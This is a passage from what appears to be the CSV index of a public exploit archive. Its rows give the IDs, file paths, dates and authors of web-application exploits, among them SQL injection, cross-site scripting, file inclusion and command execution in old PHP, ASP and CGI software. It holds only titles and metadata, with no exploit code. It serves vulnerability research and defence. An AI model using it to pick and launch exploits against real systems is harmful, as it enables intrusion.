6.0.100.75 - Cross-Site Scripting",2017-11-16,"Miguel Mendez Z",aspx,webapps, -22443,exploits/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps, -22444,exploits/php/webapps/22444.txt,"Justice Guestbook 1.3 - Full Path Disclosure",2003-03-29,euronymous,php,webapps, -22445,exploits/php/webapps/22445.txt,"ScozBook 1.1 - Full Path Disclosure",2003-03-29,euronymous,php,webapps, -22451,exploits/php/webapps/22451.txt,"Phorum 3.4 - Email Subject Line Script Injection",2003-04-02,peter,php,webapps, -22457,exploits/php/webapps/22457.txt,"PHPSysInfo 2.0/2.1 - 'index.php' File Disclosure",2003-04-03,"Albert Puigsech Galicia",php,webapps, -22459,exploits/php/webapps/22459.txt,"PHPSysInfo 2.0/2.1 - 'index.php' LNG File Disclosure",2003-04-04,"Albert Puigsech Galicia",php,webapps, -22461,exploits/php/webapps/22461.txt,"Invision Board 1.1.1 - 'functions.php' SQL Injection",2003-04-05,"Gossi The Dog",php,webapps, -22463,exploits/php/webapps/22463.txt,"WordPress Plugin Spider Catalog 1.1 - HTML Code Injection / Cross-Site Scripting",2012-11-04,D4NB4R,php,webapps, -22473,exploits/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 - PHP Code Injection",2003-04-07,"Berend-Jan Wever",php,webapps, -22474,exploits/php/webapps/22474.txt,"Py-Membres 4.0 - SQL Injection",2003-04-07,frog,php,webapps, -22477,exploits/php/webapps/22477.txt,"PHPay 2.2 - Multiple Full Path Disclosure Vulnerabilities",2003-04-09,"Ahmet Sabri ALPER",php,webapps, -22478,exploits/php/webapps/22478.txt,"PHPay 2.2 - Cross-Site Scripting",2003-04-09,"Ahmet Sabri ALPER",php,webapps, -22481,exploits/cgi/webapps/22481.txt,"Super Guestbook 1.0 - Sensitive Information Disclosure",2002-04-10,Over_G,cgi,webapps, -22482,exploits/cgi/webapps/22482.txt,"Guestbook 4.0 - Sensitive Information Disclosure",2003-04-10,Over_G,cgi,webapps, -22484,exploits/asp/webapps/22484.txt,"Ocean12 ASP Guestbook Manager 1.0 - Information Disclosure",2003-04-11,drG4njubas,asp,webapps, -22486,exploits/cfm/webapps/22486.txt,"InstaBoard 1.3 - 'index.cfm' SQL Injection",2003-04-14,"Jim Dew",cfm,webapps, -22487,exploits/asp/webapps/22487.txt,"Web Wiz Site News 3.6 - Information Disclosure",2003-04-14,drG4njubas,asp,webapps, -22490,exploits/multiple/webapps/22490.txt,"ZPanel 10.0.1 - Cross-Site Request Forgery / Cross-Site Scripting / SQL Injection / Password Reset",2012-11-05,pcsjj,multiple,webapps, -22491,exploits/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps, -22501,exploits/php/webapps/22501.txt,"Xonic.ru News 1.0 - 'script.php' Remote Command Execution",2003-03-31,"DWC Gr0up",php,webapps, -22492,exploits/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Full Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps, -22493,exploits/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall - Multiple Vulnerabilities",2012-11-05,Procheckup,hardware,webapps, -22498,exploits/php/webapps/22498.txt,"osCommerce 2.2 - Authentication Bypass",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -22499,exploits/cgi/webapps/22499.pl,"IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (1)",2003-04-15,"Nick Cleaton",cgi,webapps, -22500,exploits/cgi/webapps/22500.pl,"IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)",2003-05-05,snooq,cgi,webapps, -22507,exploits/asp/webapps/22507.txt,"Web Wiz Forum 6.34 - Information Disclosure",2003-04-17,"Uziel aka nuJIurpuM",asp,webapps, -22513,exploits/asp/webapps/22513.txt,"MPCSoftWeb 1.0 - Database Disclosure",2003-04-21,drG4njubas,asp,webapps, -22517,exploits/php/webapps/22517.txt,"OpenBB 1.0/1.1 - 'index.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps, -22519,exploits/php/webapps/22519.txt,"OpenBB 1.0/1.1 - 'board.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps, -22520,exploits/php/webapps/22520.txt,"OpenBB 1.0/1.1 - 'member.php' SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps, -22571,exploits/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Command Execution",2003-05-07,"Revin Aldi",cgi,webapps, -22524,exploits/php/webapps/22524.txt,"ZenPhoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps, -22529,exploits/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum - 'login.asp' SQL Injection",2003-04-23,Du|L,asp,webapps, -22534,exploits/php/webapps/22534.txt,"Truegalerie 1.0 - Unauthorized Administrative Access",2003-04-25,frog,php,webapps, -22539,exploits/php/webapps/22539.txt,"Xoops 1.3.x/2.0 MyTextSanitizer - HTML Injection",2003-04-25,magistrat,php,webapps, -22543,exploits/php/webapps/22543.txt,"Onecenter Forum 4.0 - IMG Tag Script Injection",2003-04-25,"David F. Madrid",php,webapps, -22544,exploits/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure",2003-04-26,"Network Intelligence",cfm,webapps, -22545,exploits/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution",2003-04-26,aresu@bosen.net,cgi,webapps, -22547,exploits/php/webapps/22547.php,"Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps, -22548,exploits/php/webapps/22548.txt,"Xivo 1.2 - Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,php,webapps, -22549,exploits/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server - Directory Traversal",2012-11-07,"Patrick Saladino",hardware,webapps, -22554,exploits/asp/webapps/22554.txt,"Microsoft BizTalk Server 2000/2002 DTA - 'rawdocdata.asp' SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps, -22555,exploits/asp/webapps/22555.txt,"Microsoft BizTalk Server 2000/2002 DTA - 'RawCustomSearchField.asp' SQL Injection",2003-04-30,"Cesar Cerrudo",asp,webapps, -22557,exploits/php/webapps/22557.txt,"PHP-Nuke Splatt Forum 4.0 Module - Cross-Site Scripting",2003-05-01,"Morning Wood",php,webapps, -22558,exploits/php/webapps/22558.txt,"PHP-Nuke Splatt Forum 4.0 Module - HTML Injection",2003-05-01,"Morning Wood",php,webapps, -22559,exploits/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 - Arbitrary Command Execution",2003-05-01,"Aleksey Sintsov",cgi,webapps, -22572,exploits/cgi/webapps/22572.pl,"HappyMall E-Commerce Software 4.3/4.4 - 'Member_HTML.cgi' Command Execution",2003-05-08,"Revin Aldi",cgi,webapps, -22577,exploits/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps, -22578,exploits/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps, -22579,exploits/php/webapps/22579.txt,"Phorum 3.4.x - 'Message Form' HTML Injection",2003-05-09,WiciU,php,webapps, -22583,exploits/asp/webapps/22583.pl,"Snitz Forums 2000 - 'register.asp' SQL Injection",2003-05-10,sharpiemarker,asp,webapps, -22588,exploits/cgi/webapps/22588.txt,"Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Cross-Site Scripting",2003-05-12,"Julio Cesar",cgi,webapps, -22589,exploits/php/webapps/22589.txt,"PHP-Nuke 5.x/6.x Web_Links Module - SQL Injection",2003-05-12,"Albert Puigsech Galicia",php,webapps, -22590,exploits/php/webapps/22590.txt,"NetOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,php,webapps, -22592,exploits/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps, -22595,exploits/php/webapps/22595.txt,"PHP-Nuke 6.5 - 'modules.php?Username' Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",php,webapps, -22597,exploits/php/webapps/22597.txt,"PHP-Nuke 6.5 (Multiple Downloads Module) - SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps, -22598,exploits/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure",2003-05-13,"Rynho Zeros Web",php,webapps, -22599,exploits/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",php,webapps, -22600,exploits/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,php,webapps, -22603,exploits/php/webapps/22603.txt,"PHP-Proxima - 'autohtml.php' Information Disclosure",2003-05-14,"Mind Warper",php,webapps, -22605,exploits/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection",2003-05-15,frog,php,webapps, -22606,exploits/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access",2003-05-15,frog,php,webapps, -22607,exploits/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps, -22612,exploits/php/webapps/22612.txt,"ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps, -22618,exploits/php/webapps/22618.txt,"ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL Injection",2003-05-20,ScriptSlave@gmx.net,php,webapps, -22625,exploits/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,php,webapps, -22632,exploits/php/webapps/22632.txt,"XMB Forum 1.8 - 'member.php' Cross-Site Scripting",2003-06-22,"Marc Ruef",php,webapps, -22639,exploits/asp/webapps/22639.txt,"IISProtect 2.1/2.2 - Web Administration Interface SQL Injection",2003-05-23,Gyrniff,asp,webapps, -22641,exploits/php/webapps/22641.txt,"BLNews 2.1.3 - Remote File Inclusion",2003-05-24,Over_G,php,webapps, -22642,exploits/php/webapps/22642.txt,"Ultimate PHP Board 1.9 - 'admin_iplog.php' Arbitrary PHP Execution",2003-05-24,euronymous,php,webapps, -22651,exploits/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module - SQL Injection",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps, -22654,exploits/php/webapps/22654.txt,"Bananadance Wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps, -22656,exploits/php/webapps/22656.py,"vBulletin vBay 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps, -22663,exploits/php/webapps/22663.txt,"Newsscript 1.0 - Administrative Privilege Escalation",2003-05-27,"Peter Winter-Smith",php,webapps, -22669,exploits/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting",2003-05-28,"silent needel",cgi,webapps, -22671,exploits/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 - 'URI' File Disclosure",2003-05-29,pokleyzz,php,webapps, -22672,exploits/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,php,webapps, -22673,exploits/asp/webapps/22673.txt,"philboard 1.14 - 'philboard_admin.asp' Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps, -22675,exploits/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,php,webapps, -22684,exploits/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps, -22687,exploits/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps, -22688,exploits/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe?css' Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps, -22689,exploits/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe?css' Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps, -22692,exploits/cgi/webapps/22692.txt,"Zeus Web Server 4.x - Admin Interface 'VS_Diag.cgi' Cross-Site Scripting",2003-05-29,"Hugo Vazquez",cgi,webapps, -22693,exploits/php/webapps/22693.txt,"cPanel 5/6 / Formail-Clone - E-Mail Restriction Bypass",2003-05-30,"Chad C. Keep",php,webapps, -22697,exploits/asp/webapps/22697.asp,"iisCart2000 - Arbitrary File Upload",2003-05-31,Bosen,asp,webapps, -22698,exploits/asp/webapps/22698.pl,"WebCortex WebStores2000 - SQL Injection",2003-05-31,Bosen,asp,webapps, -22702,exploits/php/webapps/22702.pl,"Webfroot Shoutbox 2.32 - 'Expanded.php' Remote Command Execution",2003-06-02,_6mO_HaCk,php,webapps, -22704,exploits/php/webapps/22704.txt,"Webchat 2.0 Module - Full Path Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps, -22705,exploits/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 - 'Expanded.php' Directory Traversal",2003-06-02,_6mO_HaCk,php,webapps, -22708,exploits/php/webapps/22708.txt,"dotProject 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps, -22709,exploits/php/webapps/22709.txt,"Narcissus - Remote Command Execution",2012-11-14,dun,php,webapps, -22713,exploits/php/webapps/22713.txt,"MYRE Realty Manager - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps, -22710,exploits/php/webapps/22710.txt,"friendsinwar FAQ Manager - SQL Injection / Authentication Bypass",2012-11-14,d3b4g,php,webapps, -22711,exploits/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps, -22712,exploits/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps, -22715,exploits/php/webapps/22715.txt,"WebChat 2.0 - 'users.php?Database Username Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps, -22716,exploits/php/webapps/22716.txt,"WebChat 2.0 - 'users.php' Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps, -22717,exploits/php/webapps/22717.txt,"SPChat 0.8 Module - Remote File Inclusion",2003-06-02,"Rynho Zeros Web",php,webapps, -22724,exploits/asp/webapps/22724.txt,"Xpressions Interactive - Multiple SQL Injections",2003-06-04,"Paul Craig",asp,webapps, -22725,exploits/php/webapps/22725.txt,"PHP 4 - 'PHPInfo()' Cross-Site Scripting",2002-10-12,"Matthew Murphy",php,webapps, -22730,exploits/asp/webapps/22730.txt,"Mailtraq 2.2 - 'Browse.asp' Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps, -22731,exploits/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps, -22735,exploits/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps, -22736,exploits/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,php,webapps, -22741,exploits/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps, -22742,exploits/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,php,webapps, -22743,exploits/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - 'Admin.cgi' Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps, -22744,exploits/asp/webapps/22744.txt,"Synkron.Web 3.0 - HTML Injection",2003-06-06,Gyrniff,asp,webapps, -22746,exploits/asp/webapps/22746.txt,"Maxwebportal 1.30 - 'search.asp?Search' Cross-Site Scripting",2003-06-06,JeiAr,asp,webapps, -22747,exploits/asp/webapps/22747.txt,"Maxwebportal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps, -22750,exploits/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 - 'index.php' Remote File Inclusion",2003-06-06,farking,php,webapps, -22752,exploits/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",java,webapps, -22760,exploits/php/webapps/22760.txt,"Sphera HostingDirector 1.0/2.0/3.0 - VDS Control Panel Account Configuration Modification",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -22761,exploits/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps, -22762,exploits/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -22829,exploits/php/webapps/22829.txt,"weBid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 -22767,exploits/php/webapps/22767.txt,"PostNuke 0.723 - 'user.php' UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps, -22770,exploits/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps, -22766,exploits/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php?question' SQL Injection",2012-11-16,unsuprise,php,webapps, -22772,exploits/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps, -22776,exploits/php/webapps/22776.txt,"PMachine 2.2.1 - '/Lib.Inc.php' Remote File Inclusion / Command Execution",2003-06-15,frog,php,webapps, -22777,exploits/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps, -22778,exploits/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - 'search.asp' Cross-Site Scripting",2003-06-16,JeiAr,asp,webapps, -22791,exploits/php/webapps/22791.txt,"SquirrelMail 1.2.11 - 'move_messages.php' Arbitrary File Moving",2003-06-17,dr_insane,php,webapps, -22792,exploits/php/webapps/22792.txt,"SquirrelMail 1.2.11 Administrator Plugin - 'options.php' Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps, -22793,exploits/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Multiple Vulnerabilities",2003-06-17,dr_insane,php,webapps, -22798,exploits/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps, -22799,exploits/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 - Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps, -22804,exploits/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 - Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps, -22805,exploits/jsp/webapps/22805.txt,"Tmax Soft JEUS 3.1.4 p1 - URL.jsp Cross-Site Scripting",2003-06-17,"Jeremy Bae",jsp,webapps, -22808,exploits/php/webapps/22808.txt,"pMachine 1.0/2.x - '/lib/' Multiple Script Direct Request Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -22809,exploits/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script 'sfx' Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -22810,exploits/php/webapps/22810.txt,"pMachine 1.0/2.x - Search Module Cross-Site Scripting",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -22812,exploits/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",php,webapps, -22818,exploits/php/webapps/22818.txt,"Tutos 1.1 - 'File_Select.php' Cross-Site Scripting",2003-06-20,"François SORIN",php,webapps, -22819,exploits/php/webapps/22819.txt,"Tutos 1.1 - File_New Arbitrary File Upload",2003-06-20,"François SORIN",php,webapps, -22820,exploits/php/webapps/22820.txt,"XMB Forum 1.8 - 'member.php?member' Cross-Site Scripting",2003-06-23,"Knight Commander",php,webapps, -22821,exploits/php/webapps/22821.txt,"XMB Forum 1.8 - 'buddy.php?action' Cross-Site Scripting",2003-06-23,"Knight Commander",php,webapps, -22826,exploits/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure",2003-06-23,posidron,php,webapps, -22828,exploits/php/webapps/22828.txt,"WeBid 1.0.5 - Cross-Site Scripting",2012-11-19,"Woody Hughes",php,webapps, -22841,exploits/php/webapps/22841.txt,"iXmail 0.2/0.3 - 'iXmail_NetAttach.php' File Deletion",2003-06-26,leseulfrog,php,webapps, -22842,exploits/php/webapps/22842.txt,"CutePHP CuteNews 1.3 - HTML Injection",2003-06-29,"Peter Winter-Smith",php,webapps, -22843,exploits/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",cgi,webapps, -22845,exploits/php/webapps/22845.txt,"PABox 1.6 - Password Reset",2003-06-30,silentscripter,php,webapps, -22849,exploits/jsp/webapps/22849.txt,"Verity K2 Toolkit 2.20 - Cross-Site Scripting",2003-07-02,"SSR Team",jsp,webapps, -22852,exploits/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,multiple,webapps, -22853,exploits/php/webapps/22853.txt,"WordPress Plugin Facebook Survey 1.0 - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",php,webapps, -22857,exploits/jsp/webapps/22857.txt,"Verity K2 Toolkit 2.20 Query Builder Search Script - Cross-Site Scripting",2003-07-02,"SSR Team",jsp,webapps, -22864,exploits/asp/webapps/22864.txt,"ProductCart 1.5/1.6/2.0 - 'Custva.asp' SQL Injection",2003-07-04,Bosen,asp,webapps, -22865,exploits/asp/webapps/22865.txt,"ProductCart 1.5/1.6/2.0 - 'login.asp' SQL Injection",2003-07-04,Bosen,asp,webapps, -22866,exploits/asp/webapps/22866.txt,"ProductCart 1.5/1.6/2.0 - 'MSG.asp' Cross-Site Scripting",2003-07-05,atomix,asp,webapps, -22868,exploits/asp/webapps/22868.txt,"ProductCart 1.5/1.6/2.0 - File Disclosure",2003-07-05,"Tri Huynh",asp,webapps, -22874,exploits/php/webapps/22874.txt,"CPanel 5.0/5.3/6.x - Admin Interface HTML Injection",2003-07-07,"Ory Segal",php,webapps, -22877,exploits/php/webapps/22877.txt,"Yii Framework 1.1.8 - Search SQL Injection",2012-11-21,Juno_okyo,php,webapps, -22879,exploits/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps, -23035,exploits/asp/webapps/23035.txt,"Poster 2.0 - Unauthorized Privileged User Access",2003-08-15,DarkKnight,asp,webapps, -23036,exploits/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps, -22881,exploits/php/webapps/22881.txt,"PHP Server Monitor - Persistent Cross-Site Scripting",2012-11-21,loneferret,php,webapps, -22885,exploits/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 - Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps, -22886,exploits/php/webapps/22886.txt,"ChangshinSoft EZTrans Server - 'download.php' Directory Traversal",2003-07-09,"SSR Team",php,webapps, -22887,exploits/php/webapps/22887.txt,"PHPForum 2.0 RC1 - 'Mainfile.php' Remote File Inclusion",2003-07-10,theblacksheep,php,webapps, -22888,exploits/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps, -22889,exploits/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps, -22895,exploits/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 - Admin Directory Weak Default Permissions",2003-07-13,G00db0y,asp,webapps, -22896,exploits/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,php,webapps, -22901,exploits/php/webapps/22901.txt,"BlazeBoard 1.0 - Information Disclosure",2003-07-14,JackDaniels,php,webapps, -22906,exploits/php/webapps/22906.txt,"jBilling 3.0.2 - Cross-Site Scripting",2012-11-25,"Woody Hughes",php,webapps, -22907,exploits/php/webapps/22907.txt,"ES CmS 0.1 - SQL Injection",2012-11-25,"hossein beizaee",php,webapps, -22910,exploits/php/webapps/22910.html,"Splatt Forum 3/4 - Post Icon HTML Injection",2003-07-15,Lethalman,php,webapps, -22942,exploits/php/webapps/22942.txt,"WebCalendar 0.9.x - Local File Inclusion Information Disclosure",2003-07-21,noconflic,php,webapps, -22948,exploits/php/webapps/22948.txt,"MoreGroupWare 0.6.8 - WEBMAIL2_INC_DIR Remote File Inclusion",2003-07-21,"phil dunn",php,webapps, -22953,exploits/php/webapps/22953.txt,"PHP-Gastebuch 1.60 - Information Disclosure",2003-07-24,"Jim Pangalos",php,webapps, -22955,exploits/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload / Execution",2003-07-24,"Martin Eiszner",php,webapps, -22956,exploits/php/webapps/22956.txt,"e107 Website System 0.555 - 'db.php' Information Disclosure",2003-07-24,"Artoor Petrovich",php,webapps, -22958,exploits/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",php,webapps, -22963,exploits/cgi/webapps/22963.txt,"Softshoe - Parse-file Cross-Site Scripting",2003-07-28,"Bahaa Naamneh",cgi,webapps, -22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",php,webapps, -22941,exploits/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal",2003-07-21,gr00vy,php,webapps, -22921,exploits/asp/webapps/22921.txt,".netCART Settings.XML - Information Disclosure",2003-07-16,G00db0y,asp,webapps, -22922,exploits/php/webapps/22922.txt,"Ultimate Bulletin Board 6.0/6.2 - UBBER Cookie HTML Injection",2003-07-16,anti_acid,php,webapps, -22925,exploits/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 - 'Settings.inc.php' Full Path Disclosure",2003-07-17,Bosen,php,webapps, -22927,exploits/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 - 'path_simpnews' Remote File Inclusion",2003-07-18,PUPET,php,webapps, -22929,exploits/php/webapps/22929.txt,"BuyClassifiedScript - PHP Code Injection",2012-11-26,d3b4g,php,webapps, -22961,exploits/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps, -23008,exploits/php/webapps/23008.txt,"DCForum+ 1.2 - 'Subject' HTML Injection",2003-08-11,G00db0y,php,webapps, -23009,exploits/php/webapps/23009.txt,"Stellar Docs 1.2 - Full Path Disclosure",2003-08-11,G00db0y,php,webapps, -23010,exploits/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder - Full Path Disclosure",2003-08-11,G00db0y,php,webapps, -23011,exploits/php/webapps/23011.txt,"PHPOutSourcing Zorum 3.x - Cross-Site Scripting",2003-08-11,G00db0y,php,webapps, -23012,exploits/php/webapps/23012.txt,"News Wizard 2.0 - Full Path Disclosure",2003-08-11,G00db0y,php,webapps, -23013,exploits/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - SQL Injection",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -23014,exploits/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - 'day' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -23015,exploits/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - 'fatcat_id' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -23016,exploits/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - 'PAGE_id' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps, -22936,exploits/php/webapps/22936.txt,"SmartCMS - 'index.php?idx' SQL Injection",2012-11-26,NoGe,php,webapps, -22937,exploits/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps, -22960,exploits/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps, -22972,exploits/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps, -22977,exploits/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board - SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps, -22986,exploits/php/webapps/22986.txt,"Macromedia Dreamweaver MX 6.0 - PHP User Authentication Suite Cross-Site 